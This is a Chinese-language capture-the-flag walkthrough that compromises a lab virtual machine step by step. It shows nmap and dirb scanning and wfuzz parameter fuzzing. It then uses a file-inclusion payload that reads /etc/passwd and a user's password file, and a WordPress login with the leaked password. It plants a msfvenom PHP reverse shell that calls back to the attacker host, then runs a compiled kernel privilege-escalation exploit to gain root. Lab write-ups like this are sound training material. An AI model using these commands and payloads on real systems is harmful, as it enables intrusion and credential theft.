在Vmware中查看默认的子网掩码,一般是24个主机位,所以一般只需要遍历后八位,也就是255个ip查看哪些ip使用就能查到靶机号码
找到网段再从以c段扫描,从192.168.174.1/24 开始
在kali虚拟机中扫描 使用nmap -sP 网段进行扫描
其中太小和太大的可以不看,而129是kail攻击机
只剩下130
在对比Vmware中查看的mac地址
在靶机训练中查看mac地址
找到其mac地址为 DA:44
再从刚刚使用nmap查找出来的主机中逐个进行比对
最终找到其ip地址192.168.174.130
找漏洞
从操作系统和软件入手
先查看机器上运行的软件 查看端口,端口和程序是一一对应的关系,一个服务对应一个端口扫描端口,扫描端口即可查看对应的程序
使用nmap扫描 -p指定端口范围,1-655535 若不指定端口则只会扫描常用的1000个端口 -A表示强力模式
nmap -p 1-65535 -A 192.168.174.130
网上搜索 端口和程序对应表
若从22端口入手可以使用爆破,但需要好的字典
从80入手即Web入手,http的漏洞很多,若存在80端口一般从这方面入手
使用浏览器打开刚刚查到的ip地址
- 查看源码 没有有用的信息
- 扫描目录 使用浏览器访问19168.174.130访问的是根目录
扫描-common.php -config.php 将其作为一个字典访问,若返回200则存在,404 40以上不存在
需要目录字典和发起http请求的工具
扫描目录的工具 BP 御剑 dirsearch dirb dirmap
kali中 dirb可以扫描网站,只需要把IP给他,也可以指定字典。。。
后访问 http://192.168.174.130/wordpress
1.
提示:需要带参数扫描,结果才能更加具象
2
使用过滤后缀名 txt zip rar php(数据库连接配置)
dirb http://192.168.174.130 -X .txt,.zip,.php
找到三个文件,分别在浏览器中打开
打开http://192.168.174.130/secret.php
在找到的每个php文件中做一个fuzz
fuzz :模糊测试 本质上是一个发起http请求的工具
- 目录扫描,拿一个词典将其拼接在url后分析其响应的结果
- 找参数 http://19168.174.130/para(未知,使用组织好的字典替换等号左边的词,一次次发起http请求)=value
- 密码的暴力破解 username password
- 找一些SQL XSS注入
- 压力测试
kali自带wfuzz
使用wfuzz找参数
响应 代码行数 单词数 字符数量
正确参数与错误的参数不一样 查找不一样的参数 代码行数 单词数 字符数量
将不一样的参数过滤出来
--hw 12 即不显示含有12的行
--hc,--hl,--hw,--hh是四种隐藏过滤的内容参数 依次对其齐
找到名为file 即 http://192.168.174.130/index.php?file=?
漏洞:文件包含漏洞,开发时将文件放在common.php然后让很多文件引用他
乌班图的系统上的阿帕奇 访问config文件 /root/etc/passwd
但前面提示中给了名为location.txt 的文件
访问:http://192.168.174.130/index.php?file=location.txt
提示:secrettier360 参数是正确的参数 文件换成其他的php文件
则将file换成secrettier360 把剩下的另外一个index.php换成image.php
此时不知道访问哪一个文件
http://192.168.174.130/image.php?secrettier360=?
访问/etc/passwd 文件格式,存储用户名和密码 用户名 密码(x:移到shadow文件中了显示x)|用户id 组别id 若用户id和组别id为0则是root|
访问:http://192.168.174.130/image.php?secrettier360=/etc/passwd
由于在浏览器中看不到换行
可以在kali中使用curl访问网站 可以显示出html网页的源码
提示:在文件的后面:find password.txt file in my directory:/home/saket
根据提示
访问:http://192.168.174.130/image.php?secrettier360=/home/saket/password.txt
提示:follow_the_ippsec
之前扫过一个wordpress访问http://192.168.174.130/wordpress
wordpress博客类的网站
wordpress开源博客程序,搭建个人网站使用wordpress 不需要写代码
收集刚刚访问网站的用户
点击victor
网页变成author=1
使用kali
wpscan --url http://192.168.174.130/wordpress/ --enumerate u
点击
账号:victor密码刚刚提示中的:follow_the_ippsec
登录成功!!
寻找上传文件、写入文件的地方将一句话木马写入其中
主题编辑器,在后台编辑主题样式
由于存在一些文件不能更改
找到secret.php
写一个php反弹连接,一句话木马
使用反弹连接效果好
使用msf生成一个反弹连接的木马,使用msf配套工具
打开MSF 美少妇 Metasploit Framework(MSF)
使用MSF生成一个php的反弹连接
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.174.129 lport=7777 -o shell.php
php的程序指定用php反弹连接的模块 kali攻击机的ip 指定的端口:随便指定
按下Enter
开启另一个窗口进行监听
输入使用的模块
本机ip
需要先进入文件在配置ip
使用use exploit/mulit/handler进入
本机监听的端口
开始监听
查看shell.php 反弹连接代码
将除了/*以外的字符复制下来
粘贴到管理器网站中
名为2019的主题 在主题文件夹中
默认:wordpress\wp-content\themes\twentynineteen
访问:http://192.168.174.130/wordpress/wp-content/themes/twentynineteen/secret.php
保存输入内容 按下Enter
转到监听界面
发现打开了meterpreter工具,这是msf中封装好的工具,可以在里面指向命令
**从普通操作系统用户提升到root用户** 提权
- sudo -l看看这个用户有那些可以有管理员以最高权限执行的程序
- 操作系统内核漏洞
- history
- 查看文件 /从目录分析 使用find搜索
操作系统漏洞:在网络上找漏洞数据库查找(msf内置)
msfconsole
exploits:漏洞利用模块 auxiliary:辅助模块 post:后渗透
php反弹连接就是payloads生成 encoders:编码模块 evasion:免杀逃逸
searchsploit 16.04 Ubuntu 查找16.04Ubuntu有没有漏洞 上面通过查看sysinfo已知
注意4.后面的版本号,需要找能与4.10匹配上的
即< 4.13.9 有一个Local Privilege Escalation的漏洞 提权利用的脚本位置
将脚本编译好 上传到目标的靶机中执行一下,就会变成root权限
漏洞文件
将刚刚找到的文件copy到root用户的目录下去
gcc编译 将45010.c编译到45010文件中
上传编译好的文件
在之前使用监听的窗口中上传
upload /root/45010 /tmp/45010
将攻击机的/root/45010的文件上传到靶机上/tmp/45010 tmp目录:任何用户都可以读写tmp目录
进入shell (进入shell才能执行程序)
45010没有执行权限
所以将其权限加x
进入tmp目录
chmod +x 45010
./45010 按下Enter后会变成root用户
查看当前用户
查询后结果为root
使用cd /root
ls查看文件 发现key.txt 和 root.txt
清理垃圾文件